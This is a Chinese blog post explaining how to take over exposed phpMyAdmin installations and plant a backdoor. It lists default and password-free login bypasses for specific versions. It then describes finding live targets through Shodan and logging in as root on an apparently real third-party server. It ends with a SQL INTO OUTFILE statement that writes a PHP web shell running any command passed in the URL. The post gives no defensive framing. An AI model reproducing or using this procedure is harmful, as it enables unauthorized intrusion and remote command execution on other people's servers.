phpMyAdmin通过密码漏洞留后门文件


Posted in PHP onNovember 20, 2018
  • 默认 phpMyAdmin:用户名 root 密码 root 或空登陆。
  • 版本 2.11.3~2.11.4:用户名 'localhost'@'@" 登陆,无需密码。
  • 版本 2.11.9.2:用户名 root 登陆,无需密码。

经测试,第二个漏洞在 phpMyAdmin 3.5.1 版本也是可行的。原理从略。

下面让我们简单的上网看看能不能找到一些存在这样漏洞的登陆页面。

祭出著名的漏洞搜索引擎 Shodan 并搜索 phpMyAdmin。

phpMyAdmin

phpMyAdmin通过密码漏洞留后门文件

先看看有没有不需要密码登陆的,逐一尝试没有后寻找名字中包含的版本号。这里我找到一个国内的(浙江省·杭州市)。

phpMyAdmin通过密码漏洞留后门文件

地址已手动打码。

http://121.***.*.219:80/

phpMyAdmin通过密码漏洞留后门文件

登陆成功(root 权限)。

phpMyAdmin通过密码漏洞留后门文件

接下来你可以写一个 outfile 到对方主机的网络目录下。俗称 “留后门”。

SELECT "<?php system($_GET[‘cmd']); ?>" into outfile "后门文件的绝对路径"

点击运行,不出意外便在对方主机留下了一个名为 runme.php 的后门文件。

总结

以上就是这篇文章的全部内容了,希望本文的内容对大家的学习或者工作具有一定的参考学习价值,谢谢大家对三水点靠木的支持。如果你想了解更多相关内容请查看下面相关链接

PHP 相关文章推荐
mysql_num_rows VS COUNT 效率问题分析
Apr 23 PHP
php学习之流程控制实现代码
Jun 09 PHP
codeigniter教程之上传视频并使用ffmpeg转flv示例
Feb 13 PHP
php cli换行示例
Apr 22 PHP
php使用cookie实现记住登录状态
Apr 27 PHP
discuz图片顺序混乱解决方案
Jul 29 PHP
php使用pear_smtp发送邮件
Apr 15 PHP
php封装json通信接口详解及实例
Mar 07 PHP
ThinkPHP中create()方法自动验证实例
Apr 26 PHP
php利用云片网实现短信验证码功能的示例代码
Nov 18 PHP
PHP多维数组排序array详解
Nov 21 PHP
PHP安装memcache扩展的步骤讲解
Feb 14 PHP
ThinkPHP5 的简单搭建和使用详解
Nov 15 #PHP
关于php unset对json_encode的影响详解
Nov 14 #PHP
PHP集成环境XAMPP的安装与配置
Nov 13 #PHP
python进程与线程小结实例分析
Nov 11 #PHP
PHP 获取客户端 IP 地址的方法实例代码
Nov 11 #PHP
如何优雅的使用 laravel 的 validator验证方法
Nov 11 #PHP
php使用curl模拟浏览器表单上传文件或者图片的方法
Nov 10 #PHP
You might like
《Pokemon Sword·Shield》系列WEB动画《薄明之翼》第2话声优阵容公开!
2020/03/06 日漫
用PHP书写安全的脚本代码
2012/02/05 PHP
基于php导出到Excel或CSV的详解(附utf8、gbk 编码转换)
2013/06/25 PHP
理解PHP中的stdClass类
2014/04/18 PHP
php foreach正序倒序输出示例代码
2014/07/01 PHP
PHP中mysqli_get_server_version()的实例用法
2020/02/03 PHP
异步加载script的代码
2011/01/12 Javascript
基于jquery的不规则矩形的排列实现代码
2012/04/16 Javascript
html+js实现动态显示本地时间
2013/09/21 Javascript
js报$ is not a function 的问题的解决方法
2014/01/20 Javascript
javascript怎么禁用浏览器后退按钮
2014/03/27 Javascript
举例详解AngularJS中ngShow和ngHide的使用方法
2015/06/19 Javascript
多种js图片预加载实现方式分享
2016/02/19 Javascript
浅析Javascript中bind()方法的使用与实现
2016/04/29 Javascript
Canvas实现动态的雪花效果
2017/02/13 Javascript
JS实现复制功能
2017/03/01 Javascript
jQuery选取所有复选框被选中的值并用Ajax异步提交数据的实例
2017/08/04 jQuery
深入理解vuex2.0 之 modules
2017/11/20 Javascript
vue实现菜单切换功能
2019/05/08 Javascript
layui操作列按钮个数和文字颜色的判断实例
2019/09/11 Javascript
Vue实现圆环进度条的示例
2021/02/06 Vue.js
在类Unix系统上开始Python3编程入门
2015/08/20 Python
Python音频操作工具PyAudio上手教程详解
2019/06/26 Python
python实现在列表中查找某个元素的下标示例
2020/11/16 Python
性能服装:HYLETE
2018/08/14 全球购物
GAZMAN官网:澳大利亚领先的男装品牌
2019/12/19 全球购物
论文指导教师评语
2014/04/28 职场文书
航空学院求职信
2014/06/11 职场文书
2015年全国科普日活动总结
2015/03/23 职场文书
居委会工作总结2015
2015/05/18 职场文书
入队仪式主持词
2015/07/04 职场文书
毕业晚宴祝酒词
2015/08/11 职场文书
初中语文教学反思范文
2016/03/03 职场文书
css position fixed 左右双定位的实现代码
2021/04/29 HTML / CSS
详解JS ES6编码规范
2021/05/07 Javascript
Linux系统下安装PHP7.3版本
2021/06/26 PHP